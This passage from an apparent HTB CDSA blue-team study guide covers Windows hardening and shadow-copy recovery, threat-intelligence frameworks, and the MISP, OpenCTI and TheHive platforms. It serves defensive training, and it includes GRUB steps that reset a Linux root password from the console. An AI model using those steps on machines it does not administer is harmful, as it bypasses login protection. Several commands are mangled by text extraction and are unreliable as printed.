 executable file on your system. It doesn't
 matter
 which.
 Step 10: Drag the slider up to Any Publisher
 and
 then click Next.
 Step 11: Click Next on the Exceptions screen.
 Step 12: Name policy, Example "only run
 executables
 that are signed" and click Create.
 Step 13: If this is your first time creating
 an
 Applocker policy, Windows
You can then enforce the GPU and restart
 C:\> gpupdate /force
 C:\> gpupdate /sync
 C:\> shutdown.exe /r
With PowerShell
                          146 / 547
                           HTB CDSA
Import the module
 PS C:\> import-module Applocker
Allow executable files under   C:\Windows\System32   to
run
 PS C:\> Get-Childitem
 C:\Windows\System32\*,exe |
 Get-ApplockerFileinformation | New-
 ApplockerPolicy -
 RuleType Publisher, Hash -User Everyone -
 RuleNamePrefix System32
Showing local rules in a grid view
 PS C:\> Get-AppLockerPolicy -Local -Xml |
 OutGridView
Security controls and hardening using
the Registry editor
Disallow an exe file from running. You can specify the
filename or with its path.
 C:\> reg add
 "HKCU\Software\Microsoft\Windows\CurrentVersio
 n\Policies\Explorer\DisallowRun" /v file-
 name.exe /t REG_SZ /d file-name.exe /f
                            147 / 547
                             HTB CDSA
Disable remote desktop connections
 C:\> reg add
 "HKLM\SYSTEM\CurrentControlSet\Control\Termina
 l Server" /f /v DenyTSConnections /t REG_DWORD
 /d 1
Disable anonymous enumeration of SAM accounts.
 C:\> reg add
 HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v
 restrictanonymoussam /t REG_DWORD /d 1 /f
Disable sticky keys
 C:\> reg add "HKCU\Control
 Panel\Accessibility\StickyKeys" /v Flags /t
 REG_SZ
 /d 506 /f
Disable Toggle Keys
 C:\> reg add "HKCU\Control
 Panel \Accessibility\ ToggleKeys" /v Flags /t
 REG_SZ
 Id 58 /f
Disable On-screen keyboard
                             148 / 547
                           HTB CDSA
 C:\> reg add
 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
 \Authentication\LogonUI /f /v
 ShowTabletKeyboard /t
 REG_DWORD /d 0
Disable administrative shares:
Workstations
 C:\> reg add
 HKLM\SYSTEM\CurrentControlSet\Services\LanmanS
 erver\
 Parameters /f /v AutoShareWks /t REG_DWORD /d
 0
Servers
 C:\> reg add
 HKLM\SYSTEM\CurrentControlSet\Services\LanmanS
 erver\
 Parameters /f /v AutoShareServer /t REG_DWORD
 /d 0
Prevent passthehash attack
 C:\> reg add
 HKLM\SYSTEM\CurrentControlSet\Control\Lsa /f
 /v
 NoLMHash /t REG_DWORD /d 1
                             149 / 547
                           HTB CDSA
Enable UAC
 C:\> reg add
 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
 \Polic
 ies\System /v EnableLUA /t REG_DWORD /d 1 /f
Recovery
The steps below can be followed to start the recovery of
the infected workstation/domain controller
     Restore from a trusted backup
     Reset all users' passwords and if the machine is a
     domain controller or part of a domain, reset all
     critical accounts' passwords such as privileged
     users and domain controllers.
     Change the password for the Kerberos service
     account and make it unusable for the attacker.
     Perform a thorough malware scanning of all domain
     controllers and domain-joined systems.
     Patching all vulnerable systems to prevent
     exploitation of systems through publicly available
     exploits.
     Disable the use of removable media on host
     computers, as attackers may propagate the malware
     on the whole network.
Backup and Restore
Windows
                           150 / 547
                           HTB CDSA
Group Policy Update and Recovery
Backup GPO Audit Policy to backup file
 C:\> auditpol /backup /file:C\auditpolicy.csv
Restore GPO Audit Policy from backup file
 C:\> auditpol /restore
 /file:C:\auditpolicy.csv
Backup All GPOs in domain and save to Path
 PS C:\> Backup-Gpo -All -Path \\<SERVER>\<PATH
 TO BACKUPS>
Restore All GPOs in domain and save to Path
 PS C:\> Restore-GPO -All -Domain <INSERT
 DOMAIN
 NAME> -Path \\Serverl\GpoBackups
Volume Shadow Service
VSS is used to create snapshots of files/entire volumes
while they are still in use. You can create or store
shadow copies on a local disk, external hard drive, or
network drive. Every time a system restore point is
created, you will have a valid shadow copy. Shadow Copy
maintains snapshots of the entire volumes, so you can
also use shadow copies to recover deleted files besides
restoring system.
                           151 / 547
                           HTB CDSA
Enabling and Creating Shadow Copies and system restore
points
Steps
 Step 1. Type **Create a restore point** in the
 search box and select it. Then, in the System
 Properties, **choose a drive** and
 click **Configure**.
 Step 2. In the new window, tick **Turn on
 system protection** and click **Apply** to
 enable.
 Step 3. Click **Create** to enable volume
 shadow copy in Windows 10.
Creating Shadow Copies and Restore Points using Task
Scheduler
By using task scheduler, you can create shadow copies
and restore points at a regular time intervals.
Steps
 Step 1. Open Task Scheduler. You can
 click **Start**, type **task scheduler** and
 select it from the list.
 Step 2. Click **Create Task** and then specify
 a name for the task (eg: ShadowCopy).
 Step 3. Create a new trigger. You can click
                            152 / 547
                          HTB CDSA
 the **Triggers** tab and **New...** option at
 the lower location, then select one setting
 among one time, daily, weekly, monthly.
 Step 4. Enable shadow copy. You can click
 the **Actions** tab and **New... option**,
 type **wmic** under the Program or script
 option, input the argument **shadowcopy call
 create Volume=C:\** at the blank box on the
 right side.
Restoring Shadow Copies using previous versions
Steps
 Step 1. **Navigate to the file or folder** you
 want to restore in a previous state and right-
 click it, then select Restore Previous
 Versions from the drop-down menu. In addition,
 you still can select **Properties** and click
 the **Previous Versions** tab.
 Step 2. Select the correct version of file or
 folder to restore.
 In this window, you can see 3 options,
 including **Open**, **Copy**, **Restore**.
 ● The Open button will navigate to the
 location where the file or folder is stored.
 ● The Copy button allows you to copy file or
 folder to another location on the computer,
                          153 / 547
                           HTB CDSA
 even on external hard drive.
 ● The Restore button gives you a chance to
 restore the file or folder to the same
 location and replace the existing version.
Restore Snapshots and Shadow Copies using Shadow
Explorer Tool
Download the tool from the below link
 https://www.shadowexplorer.com/downloads.html
Managing Shadow Copies From The Command Line
Start Volume Shadow Service
 C:\> net start VSS
List all shadow files and storage
 C:\> vssadmin List ShadowStorage
List all shadow files
 C:\> vssadmin List Shadows
Browse Shadow Copy for files/folders
 C:\> mklink /d c:\<CREATE FOLDER>\<PROVIDE
 FOLDER NAME BUT DO NOT CREATE> \\?
 \GLOBALROOT\Device\HarddiskVolumeShadowCopyl\
Revert back to a selected shadow file on Windows Server
                           154 / 547
                            HTB CDSA
 C:\> vssadmin revert shadow /shadow={<SHADOW
 COPYID>} /ForceDismount
List a files previous versions history using
volrest.exe
 C:\> "\Program Files (x86)\Windows Resource
 Kits\Tools\volrest.exe" "\\localhost\c$\<PATH
 TO FILE>\<FILE NAME>"
Revert back to a selected previous file version or
@GMT file name for specific previous version using
volrest.exe
 C:\> subst Z: \\localhost\c$\$\<PATH TO FILE>
 C:\> "\Program Files (x86)\Windows Resource
 Kits\Tools\volrest.exe" "\\localhost\c$\<PATH
 TO FILE>\<CURRENT FILE NAME OR @GMT FILE NAME
 FROM LIST COMMAND ABOVE>" /R:Z:\
 C:\> subst Z: /0
Revert back a directory and subdirectory files
previous version using volrest.exe
 C: \> "\Program Files (x86) \Windows Resource
 Kits\Tools\volrest.exe" \\localhost\c$\<PATH
 TO
                            155 / 547
                          HTB CDSA
 FOLDER\*·* /5 /r:\\localhost\c$\<PATH TO
 FOLDER>\
Link to `volrest.exe
 Ref. https://www.microsoft.com/enus/
 download/details.aspx?id=17657
Managing Shadow Copies using wmic and PowerShell
Revert back to a selected shadow file on Windows Server
and Windows 7 and 10 using wmic
 C:\> wmic shadowcopy call create Volume='C:\'
Create a shadow copy of volume C on Windows 7 and 10
 PS C:\> (gwmi -list
 win32_shadowcopy).Create('C:\','ClientAccessib
 le')
Create a shadow copy of volume C on Windows Server
2003 and 2008:
 C:\> vssadmin create shadow /for=c:
Create restore point on Windows
 C:\> wmic.exe /Namespace:\\root\default Path
 SystemRestore Call CreateRestorePoint
 "%DATE%", 100,7
                          156 / 547
                           HTB CDSA
List of restore points
 PS C:\> Get-ComputerRestorePoint
Restore from a specific restore point
 PS C:\> Restore-Computer -RestorePoint
 <RESTORE
 POINT#> -Confirm
Linux
Reset root password in single user mode
Step 1: Reboot system.
 reboot -f
Step 2: Press ESC at GRUB screen.
Step 3: Select default entry and then 'e' for edit.
Step 4: Scroll down until, you see a line that
starts with linux, linux16 or linuxefi.
Step 5: At end of that line leave a space and add without
quote
 'rw init=/bin/bash'
Step 6: Press Ctrl-X to reboot.
Step 7: After reboot, should be in single user mode
and root, change password.
 passwd
                           157 / 547
                           HTB CDSA
Step 8: Reboot system.
 reboot -f
Reinstall a package
 apt-get install --reinstall <COMPROMISED
 PACKAGE NAME>
Reinstall all packages
 # apt-get install --reinstall $(dpkg --
 getselections | grep -v deinstall)
Module 2: Threat Intelligence
and Hunting
Cyber Threat Intelligence
Definitions
From blue team perspective, it's the collection and
analysis of tactics, techniques and procedures used by
attackers to build detections.
From read team perspectives, it's the emulation of
adversaries TTPs and analysis of blue team's ability to
build detections based in IOCs and TTPs.
#EX
Red team collects TTPs from threat intelligence
frameworks and related to a certain hacking group to
                           158 / 547
                            HTB CDSA
create tools and emulate this hacking group's behaviour in
an engagement.
In cyber threat intelligence, we aim to answer the below
questions with the help of threat intelligence
     Who’s attacking you?
     What are their motivations?
     What are their capabilities?
     What artefacts and indicators of compromise (IOCs)
     should you look out for?
Information Sharing and Analysis
Centers (ISACs)
Used to share and exchange various Indicators of
Compromise (IOCs) to obtain threat intelligence
TTP
An acronym for Tactics, Techniques, and Procedures.
 The Tactic is the adversary's goal or
 objective.
 The Technique is how the adversary achieves
 the goal or objective.
 The Procedure is how the technique is
 executed.
How to gather threat intelligence
     Internal:
                            159 / 547
                           HTB CDSA
          Vulnerability assessments and incident response
          reports.
          Cyber awareness training reports.
          System logs and events.
     Community:
          Web forums.
          Dark web communities for cybercriminals.
     External
          Threat intel feeds (Commercial & Open-source).
          Online marketplaces.
          Public sources include government data,
          publications, social media, financial and
          industrial assessments.
          Malware Repositores.
 https://www.trendmicro.com/vinfo/us/threat-
 encyclopedia
 https://github.com/ytisf/theZoo
Threat Intelligence Types
Strategic
Assist senior management make informed decisions
specifically about the security budget and strategies.
Tactical
Interacts with the TTPs and attack models to identify
adversary attack patterns.
Operational
Interact with IOCs and how the adversaries operationalize.
                           160 / 547
                           HTB CDSA
Steps to create threat intelligence
campaign
 1. Identify framework and general kill chain
 2. Determine targeted adversary
 3. Identify adversary's TTPs and IOCs
 4. Map gathered threat intelligence to a kill
 chain or framework
 5. Draft and maintain needed engagement
 documentation
 6. Determine and use needed engagement
 resources (tools, C2 modification, domains,
 etc.)
Lifecycle Phases of Cyber threat
intelligence
Direction
Defining the goals and objectives by preparing the below:
     Information assets and business processes that
     require defending.
     Potential impact to be experienced on losing the
     assets or through process interruptions.
     Sources of data and intel to be used towards
     protection.
     Tools and resources that are required to defend the
     assets.
                           161 / 547
                           HTB CDSA
Collection
Analysts start gathering the data by using commercial,
private and open-source resources available. Due to the
volume of data analysts usually face, it is recommended
to automate this phase to provide time for triaging
incidents.
Processing
Raw logs, vulnerability information, malware and network
traffic usually come in different formats and may be
disconnected when used to investigate an incident. This
phase ensures that the data is extracted, sorted,
organised, correlated with appropriate tags and presented
visually in a usable and understandable format to the
analysts. SIEMs are valuable tools for achieving this and
allow quick parsing of data.
Analysis
Once the information aggregation is complete, security
analysts must derive insights. Decisions to be made may
involve:
     Investigating a potential threat through uncovering
     indicators and attack patterns.
     Defining an action plan to avert an attack and defend
     the infrastructure.
     Strengthening security controls or justifying
     investment for additional resources.
Dissemination
                            162 / 547
                            HTB CDSA
Different organisational stakeholders will consume the
intelligence in varying languages and formats. For
example, C-suite members will require a concise report
covering trends in adversary activities, financial
implications and strategic recommendations. At the same
time, analysts will more likely inform the technical team
about the threat IOCs, adversary TTPs and tactical action
plans.
Feedback
The final phase covers the most crucial part, as analysts
rely on the responses provided by stakeholders to improve
the threat intelligence process and implementation of
security controls. Feedback should be regular interaction
between teams to keep the lifecycle working.
Threat Intelligence Frameworks
Threat intelligence frameworks collect TTPs and categorize
them according to
 1.      Threat Group
 2.      Kill Chain Phase
 3.      Tactic
 4.      Objective/Goal
MITRE ATT&CK
Link
https://attack.mitre.org/
Definition
                            163 / 547
                           HTB CDSA
MITRE ATT&CK (Adversarial Tactics, Techniques, and
Common Knowledge) is a comprehensive, globally
accessible knowledge base of cyber adversary behaviour
and tactics. Developed by the MITRE Corporation, it is a
valuable resource for organizations to understand the
different stages of cyber attacks and develop effective
defences.
How it works
The ATT&CK framework is organized into a matrix that
covers various tactics (high-level objectives) and
techniques (methods used to achieve goals). The
framework includes descriptions, examples, and
mitigations for each technique, providing a detailed
overview of threat actors' methods and tools.
Use Cases
Identifying potential attack paths based on your
infrastructure
Based on your assets, the framework can map possible
attack paths an attacker might use to compromise your
organization. For example, if your organization uses Office
365, all techniques attributed to this platform are relevant
to your threat modelling exercise.
Developing threat scenarios
MITRE ATT&CK has attributed all tactics and techniques to
known threat groups. This information can be leveraged to
assess your organization based on threat groups identified
to be targeting the same industry.
Prioritizing vulnerability remediation
The information provided for each MITRE ATT&CK technique
can be used to assess the significant impact that may
occur if your organisation experiences a similar attack.
                            164 / 547
                             HTB CDSA
Given this, your security team can identify the most
critical vulnerabilities to address.
TIBER(Threat Intelligence-based Ethical
Red Teaming)-EU
Link
https://www.ecb.europa.eu/pub/pdf/other/ecb.tiber_eu_
framework.en.pdf
OST Map
Link
https://www.intezer.com/ost-map/
TAXII
Link
https://oasis-open.github.io/cti-
documentation/taxii/intro
STIX
Link
https://oasis-open.github.io/cti-documentation/stix/intro
The Diamond Model
Definition and Components
The Diamond Model is composed of four core features:
adversary, infrastructure, capability, and victim to help
analyze intrusions and give insights on the threat actor.
An     adversary   is also known as an attacker, enemy,
cyber threat actor, or hacker. The adversary is the
                             165 / 547
                             HTB CDSA
person who stands behind the cyberattack. Cyberattacks
can be an intrusion or a breach.
It is difficult to identify an adversary during the first
stages of a cyberattack. Utilizing data collected from an
incident or breach, signatures, and other relevant
information can help you determine who the adversary
might be.
Victim    is a target of the adversary. A victim can be an
organization, person, target email address, IP address,
domain, etc. It's essential to understand the difference
between the victim persona and the victim assets because
they serve different analytic functions.
Capability     is also known as the skill, tools, and
techniques used by the adversary in the event. The
capability highlights the adversary’s tactics, techniques,
and procedures (TTPs).
Capability Capacity        is all of the vulnerabilities and
exposures that the individual capability can use.
Adversary Arsenal       is a set of capabilities that belong
to an adversary. The combined capacities of an
adversary's capabilities make it the adversary's arsenal.
Infrastructure is     also known as software or hardware.
Infrastructure is the physical or logical interconnections
that the adversary uses to deliver a capability or maintain
control of capabilities. For example, a command and
control centre (C2) and the results from the victim (data
exfiltration).
Type 1 Infrastructure is the infrastructure controlled or
owned by the adversary.
Type 2 Infrastructure is the infrastructure controlled by
an intermediary. Sometimes the intermediary might or
might not be aware of it. This is the infrastructure that a
                             166 / 547
                            HTB CDSA
victim will see as the adversary. Type 2 Infrastructure
has the purpose of obfuscating the source and attribution
of the activity. Type 2 Infrastructure includes malware
staging servers, malicious domain names, compromised
email accounts, etc.
Service Providers       are organizations that provide
services considered critical for the adversary availability
of Type 1 and Type 2 Infrastructures, for example,
Internet Service Providers, domain registrars, and
webmail providers.
The Unified Kill Chain
Definition and Components
Unified kill chain is used to describe the methodology/path
attackers such as hackers or APTs use to approach and
intrude a target.
Components
The UKC states that there are 18 phases to an attack:
Everything from reconnaissance to data exfiltration and
understanding an attacker's motive. These phases have
                            167 / 547
                           HTB CDSA
been grouped together as the figure below shows
The Cyber Kill Chain
Definition
The Cyber Kill Chain helps in understanding and protecting
against ransomware attacks, security breaches as well
as Advanced Persistent Threats (APTs). We can use the
Cyber Kill Chain to assess your network and system
security by identifying missing security controls and
closing certain security gaps based on your company's
infrastructure.
Phases of an attack in Cyber kill chain
Reconnaissance
Reconnaissance is discovering and collecting information
on the system and the victim. The reconnaissance phase
is the planning phase for the adversaries. OSINT (Open-
Source Intelligence) also falls under reconnaissance.
Weaponization
                            168 / 547
                           HTB CDSA
In this phase, the attacker prepares the infrastructure
necessary to perform the attack. Examples are below:
 - Creating an infected Microsoft Office
 document containing a malicious macro or VBA
 scripts.
 - Creating a malicious payload or a very
 sophisticated worm, implant it on the USB
 drives, and then distribute them in public. An
 example of the virus.
 - Creating a Command and Control (C2) server
 for executing the commands on the victim's
 machine or deliver more payloads.
 - Creating Backdoors
Delivery
Its the phase where the attacker decides to choose the
method for transmitting the payload or the malware.
Examples of delivery can be:
 - Phishing email
 - USB Drop Attack: Distributing infected USB
 drives in public places like coffee shops,
 parking lots, or on the street.
 - Watering hole attack. A watering hole attack
 is a targeted attack designed to aim at a
 specific group of people by compromising the
                           169 / 547
                            HTB CDSA
 website they are usually visiting and then
 redirecting them to the malicious website of
 an attacker's choice.
Exploitation
Its the phase where the attacker could exploit software,
system, or server-based vulnerabilities to escalate the
privileges or move laterally through the network.
The attacker could exploit vulnerabilities by incorporating
the exploit with the payload in the weaponization phase or
simply after gaining access to the target system.
Installation
Its the phase where the attacker's aim is to reaccess the
system at a later time or in case he loses the connection
to it or if he got detected and got the initial access
removed, or if the system is later patched. He will no
longer have access to it. That is when the attacker needs
to install a backdoor. A persistent backdoor will let the
attacker access the system he compromised in the past.
Command and Control
The stage where the compromised endpoint would
communicate with an external server set up by an
attacker to establish a command & control channel. After
establishing the connection, the attacker has full control
of the victim's machine.
The objective here is to control the victim machine by
sending command and instructions to the victim machine
which in turn executes them and sends the output back to
the attacker's C2 server.
Actions on objectives
In this stage, the attacker executes the strategic goal of
his entire plan. The actions can be:
                            170 / 547
                          HTB CDSA
 - Harvesting and dumping the credentials from
 users.
 - Perform privilege escalation
 - Lateral movement through the company's
 environment.
 - Collect and exfiltrate sensitive data.
 - Deleting the backups and shadow copies.
 - Overwrite or corrupt data.
Threat Intelligence Platforms
Malware Information Sharing Platform
Definition
MISP is an open-source threat information platform that
facilitates the collection, storage and distribution of
threat intelligence and Indicators of Compromise (IOCs)
related to malware, cyber attacks, financial fraud or any
intelligence within a community of trusted members.
The threat information can be distributed and consumed by
Network Intrusion Detection Systems (NIDS), log analysis
tools and Security Information and Event Management
Systems (SIEM).
MISP Use Cases
 Malware Reverse Engineering: Sharing of
 malware indicators to understand how different
 malware families function.
                           171 / 547
                       HTB CDSA
 Security Investigations:Searching, validating
 and using indicators in investigating security
 breaches.
 Intelligence Analysis:Gathering information
 about adversary groups and their capabilities.
 Law Enforcement:Using indicators to support
 forensic investigations.
 Risk Analysis:Researching new threats, their
 likelihood and occurrences.
 Fraud Analysis:Sharing of financial indicators
 to detect financial fraud.
Installation and Setting Up
Installing on Ubuntu
 sudo apt-get update -° && sudo apt-get upgrade
 -°
 sudo apt-get install mysql-client -°
 wget
 https://raw.githubusercontent.com/MISP/MISP/2.
 4/INSTALL/INSTALL.sh
                       172 / 547
                           HTB CDSA
 chmod +x INSTALL.sh
 ./INSTALL.sh -A
 sudo ufw allow 80/tcp
 sudo ufw allow 443/tcp
Creating an organization and setting up users
We can create an organization by navigating to Select
Administration > Add Organisations
Next we enable threat intel feeds
To load the default feeds that come with MISP, click    Load
default feeds    in the feeds page
                           173 / 547
                           HTB CDSA
To use a specific feed, we will need to enable it and
cache it so that the information related to the IOCs is
stored locally
The Instance Dashboard Breakdown
When first logging in to the platform, you will see the
below dashboard
                            174 / 547
                            HTB CDSA
The most important tabs are highlighted in yellow.
Event Actions
Its where you, as an analyst, will create all malware
investigation correlations by providing descriptions and
attributes associated with the investigation. You will
create an event to describe that describes an ongoing
malware investigation and begin adding attributes and
attachments that describe your intel on the malware.
Lastly you will publish these information so that others
can see it and maybe import it to their IDS/SIEM.
Input filters
Allows the administrator to control how data is input into
the instance and how the data is exported as well by
creating different validation rules.
Global actions
Its the tab where you can see your profile, read the news
and see a list of the active organisations on this instance.
Creating an event
                             175 / 547
                           HTB CDSA
The below screeshots shows how to add an event
The distribution level controls how the event information is
shared among communities and has the below levels
 Your organisation only:his only allows members
 of your organisation to see the event.
 This Community-only:Users that are part of
 your MISP community will be able to see the
 event. This includes your organisation,
 organisations on this MISP server and
 organisations running MISP servers that
 synchronise with this server.
 Connected communities:Users who are part of
 your MISP community will see the event,
                            176 / 547
                           HTB CDSA
 including all organisations on this MISP
 server, all organisations on MISP servers
 synchronising with this server, and the
 hosting organisations of servers that are two
 hops away from this one.
 All communities:This will share the event with
 all MISP communities, allowing the event to be
 freely propagated from one server to the next.
This is how the event looks after creation
Adding attributes to the event
                           177 / 547
                            HTB CDSA
The below screenshot shows how to add an attribute
In the type field we select the type of attribute. The list
contains several options such as md5,sha1,ip..etc.
Check the below screenshot to see an example entry
The option for intrusion detection make the attribute
                            178 / 547
                           HTB CDSA
exportable to be used as an IDS signature
The option Batch import allows to join multiple attributes
of the same type in one field such as adding multiple
attibutes of type ip address. Its possible you can join
them all with this option and enter them separated by line
break.
Adding attachments to the event
You can add attachments that can be malware samples or
malware reports using the below button
Tags
You can add tags to the event and its attributues to
identify them based on IOCs and threat information which
makes sharing effective between users, organizations and
                            179 / 547
                           HTB CDSA
communities. See an example below
Publishing the event
Once event is published, it can now be seen by the
channels selected when the event first created.
OpenCTI
Definition
OpenCTI is an open-sourced platform designed to provide
organizations with the means to manage CTI through the
storage, analysis, visualisation and presentation of threat
campaigns, malware and IOCs.
The dashboard below showcases various visual widgets
summarizing the threat data ingested into OpenCTI.
Widgets on the dashboard showcase the current state of
entities ingested on the platform via the total number of
entities, relationships, reports and observables ingested,
and changes to these properties noted within 24 hours.
                           180 / 547
                             HTB CDSA
OpenCTI uses the Structured Threat Information Expression
(STIX2) standards which is a serialized and standardized
language format used in threat intelligence exchange. It
allows for the data to be implemented as entities and
relationships, effectively tracing the origin of the provided
information.
Connectors
     External Input Connector: Ingests information from
     external sources such as MISP and other threat intel
     platforms.
     Stream Connector: Consumes platform data stream
     Internal Enrichment Connector: Takes in new OpenCTI
     entities from user requests
     Internal Import File Connector: Extracts information
     from uploaded reports
     Internal Export File Connector: Exports information
     from OpenCTI into different file formats
                             181 / 547
                           HTB CDSA
Activities Section
The activities section covers security incidents ingested
onto the platform in the form of reports.
Analysis Tab
The Analysis tab contains the input entities in the form of
reports. Reports are central to OpenCTI as knowledge on
threats and events are extracted and processed.
Additionally, analysts can add their investigation notes and
other external resources for knowledge enrichment.
Events
Within the Events tab, security analysts can record their
findings about new security incidents, malwares and
                            182 / 547
                            HTB CDSA
suspicious activities to enrich their threat intel.
Observations
Technical elements, detection rules and artefacts
identified during a cyber attack are listed under this tab:
one or several identifiable makeup indicators. These
elements assist analysts in mapping out threat events
during a hunt and perform correlations between what they
observe in their environments against the intel feeds.
Knowledge Section
The Knowledge section provides linked data related to the
tools adversaries use, targeted victims and the type of
threat actors and campaigns used.
                             183 / 547
                           HTB CDSA
Threats
Under threats tab, information such as below can be found
     Threat Actors: An individual or group of attackers
     seeking to propagate malicious actions against a
     target.
     Intrusion Sets: An array of TTPs, tools, malware and
     infrastructure used by a threat actor against targets
     who share some attributes. APTs and threat groups
     are listed under this category on the platform due to
     their known pattern of actions.
     Campaigns: Series of attacks taking place within a
     given period and against specific victims initiated by
     advanced persistent threat actors who employ
     various TTPs. Campaigns usually have specified
     objectives and are orchestrated by threat actors
     from a nation-state, crime syndicate or other
     disreputable organization.
Arsenal
                            184 / 547
                            HTB CDSA
This tab lists all items related to an attack and any
legitimate tools identified from the entities.
     Malware: Known and active malware and trojan are
     listed with details of their identification and mapping
     based on the knowledge ingested into the platform.
     In our example, we analyse the 4H RAT malware and
     we can extract information and associations made
     about the malware.
     Attack Patterns: Adversaries implement and use
     different TTPs to target, compromise, and achieve
     their objectives. Here, we can look at the details of
     the Command-Line Interface and make decisions
     based on the relationships established on the
     platform and navigate through an investigation
     associated with the technique.
     Courses of Action: MITRE maps out concepts and
     technologies that can be used to prevent an attack
     technique from being employed successfully. These
     are represented as Courses of Action (CoA) against
     the TTPs.
     Tools: Lists all legitimate tools and services
     developed for network maintenance, monitoring and
     management. Adversaries may also use these tools
     to achieve their objectives. For example, for the
     Command-Line Interface attack pattern, it is possible
     to narrow down that CMD would be used as an
     execution tool. As an analyst, one can investigate
     reports and instances associated with the use of the
     tool.
     Vulnerabilities: Known software bugs, system
     weaknesses and exposures are listed to provide
     enrichment for what attackers may use to exploit
                            185 / 547
                           HTB CDSA
     and gain access to systems. The Common
     Vulnerabilities and Exposures (CVE) list maintained by
     MITRE is used and imported via a connector.
The Hive
TheHive Project is an open-source available Security
Incident Response Platform, designed to assist security
analysts and practitioners track, investigate and act upon
identified security incidents in a swift and collaborative
manner.
Key terms
Cases and Tasks
Investigations correspond to cases. The details of each
case can be broken down into associated tasks, which
can be created from scratch or through a template engine.
Analysts can record their progress, attach pieces of
evidence or noteworthy files, add tags and other archives
to cases.
                           186 / 547
                           HTB CDSA
Cases can be imported from SIEM alerts, email reports and
other security event sources. This feature allows an
analyst to go through the imported alerts and decide
whether or not they are to be escalated into investigations
or incident response.
Creating cases and tasks
Whenever there is an incident that warrants an
investigation, analysts can open and create cases to
facilitate the collaboration and exchange of incident
details.
The below figure shows how to create a case
Couple things to note from while creating the case
 [Severity]This showcases the level of impact
 the incident being investigated has on the
 environment from low to critical levels.
 [TLP]The Traffic Light Protocol is a set of
 designations to ensure that sensitive
 information is shared with the appropriate
 audience. The range of colours represents a
 scale between full disclosure of information
                            187 / 547
                           HTB CDSA
 (White) and No disclosure/ Restricted (Red).
 You can find more information about the
 definitions on the CISA website.
 [PAP]The Permissible Actions Protocol is used
 to indicate what an analyst can do with the
 information, whether an attacker can detect
 the current analysis state or defensive
 actions in place. It uses a colour scheme
 similar to TLP and is part of the MISP
 taxonomies.
Also add tasks to the case to indicate what analysts
should do once they see it in their dashboard.
TTPs
Once you create a case and assign tasks, you should
assign it the corresponding TTP as the below shows
Observables
A quick triaging process can be supported by allowing
analysts to add observables to their cases, leveraging
                           188 / 547
                            HTB CDSA
tags, flagging IOCs and identifying previously seen
observables to feed their threat intelligence. You can
create observables as the below screenshot shows
Cortex
Cortex is an observable analysis and active response
engine. Cortex allows analysts to collect more information
from threat indicators by performing correlation analysis
and developing patterns from the cases.
Dashboards
Statistics on cases, tasks, observables, metrics and
more can be compiled and distributed on dashboards that
can be used to generate useful KPIs within an
organisation.
MISP ( Malware information sharing
platform)
MISP is a threat intelligence platform for sharing, storing
and correlating Indicators of Compromise of targeted
attacks and other threats.
The integration with #TheHive allows analysts to create
                            189 / 547
                            HTB CDSA
cases from MISP events, import IOCs or export their own
identified indicators to their MISP communities.
Live stream
Allows Multiple analysts from one organisation can work
together on the same case simultaneously. Everyone can
keep an eye on the cases in real time.
User Profiles
To assign user profiles, first we create an organization
group as shown below
The pre-built user profiles are
 **admin:** full administrative permissions on
 the platform; can't manage any Cases or other
 data related to investigations;
 **org-admin:** manage users and all
 organisation-level configuration, can create
 and edit Cases, Tasks, Observables and run
 Analysers and Responders;
 **analyst:** can create and edit Cases, Tasks,
 Observables and run Analysers & Responders;
                            190 / 547
                           HTB CDSA
 **read-only:** Can only read, Cases, Tasks and
 Observables details;
For every user profile a list of associated permissions that
can be set once we add the user.
Below shows how we can add a user and assign a user-
profile.
Then we can select the permissions
Links
[1]
 https://thehive-project.org/
[2]
                            191 / 547
                           HTB CDSA
 https://github.com/TheHive-Project/TheHive
[3]
 https://github.com/TheHive-Project/Cortex/
Threat modelling
Definition of Threat Modeling
Threat modelling is a systematic approach to identifying,
prioritizing, and addressing potential security
threats across the organization. By simulating possible
attack scenarios and assessing the existing vulnerabilities
of the organization's interconnected systems and
applications, threat modelling enables organizations to
develop   proactive security            measures and make
informed decisions about resource allocation.
An example of threat modeling takes place during the early
stages of systems development, specifically during initial
design and specifications establishment. This method is
based on predicting threats and designing in specific
defenses during   the coding and crafting process .
Part of threat modeling is creating a diagram that includes
the elements involved in a transaction along with every
possible threat/attack against these elements.
Another part of threat modeling is what is called as
reduction analysis      which is also known as
decomposing the application,
system, or environment. The purpose of this task is to
gain a greater understanding of the logic of the product,
                            192 / 547
                             HTB CDSA
its internal components, as
well as its interactions with external elements. Whether
an application, a system, or an entire environment, it
needs to be divided into smaller containers or
compartments.
Those might be subroutines, modules, or objects if you're
focusing on software, computers, or operating systems;
they might be protocols if you're focusing on systems or
networks; or they might be departments, tasks, and
networks if you're focusing on an entire business
infrastructure.
Each identified element should be evaluated in order to
understand inputs, processing, security, data
management, storage, and outputs.
Lastly, the next step is to rank or rate the threats. This
can be accomplished using a wide range of techniques,
such as Probability × Damage Potential ranking,
high/medium/low rating, or the DREAD system.
The ranking technique of Probability × Damage Potential
produces a risk severity number on a scale of 1 to 100,
with 100 being the most
severe risk possible. Each of the two initial values can be
assigned numbers between 1 and 10, with 1 being the
lowest and 10 the highest.
Threat Modeling vs Threat Hunting
Threat hunting is the activity of looking
for existing evidence of a compromise once symptoms or
an IoC (indication of compromise) of an exploit become
known.
Threat modeling looks for zero-day exploits before harm is
                              193 / 547
                             HTB CDSA
experienced, whereas threat hunting uses IoC information
to find harm that has already occurred.
Creating a Threat Modeling Plan
Defining the scope
Identify the specific systems, applications, and networks
in the threat modelling exercise.
Asset Identification
Develop diagrams of the organization's architecture and
its dependencies. It is also essential to identify the
importance of each asset based on the information it
handles, such as customer data, intellectual property,
and financial information.
Identify Threats
Identify potential threats that may impact the identified
assets, such as cyber attacks, physical attacks, social
engineering, and insider threats.
Map to MITRE ATT&CK or any threat modeling/intelligence
framework
Map the identified threats to the corresponding tactics and
techniques in the MITRE ATT&CK Framework. For each
mapped technique, utilise the information found on the
corresponding ATT&CK technique page, such as the
description, procedure examples, mitigations, and
detection strategies, to gain a deeper understanding of
the threats and vulnerabilities in your system.
Analyze Vulnerabilities and Prioritize Risks
Analyze the vulnerabilities based on the potential impact of
identified threats in conjunction with assessing the
existing security controls. Given the list of vulnerabilities,
risks should be prioritized based on their likelihood and
impact.
                             194 / 547
                            HTB CDSA
Develop and Implement Countermeasures
Design and implement security controls to address the
identified risks, such as implementing access controls,
applying system updates, and performing regular
vulnerability assessments.
Monitor and Evaluate
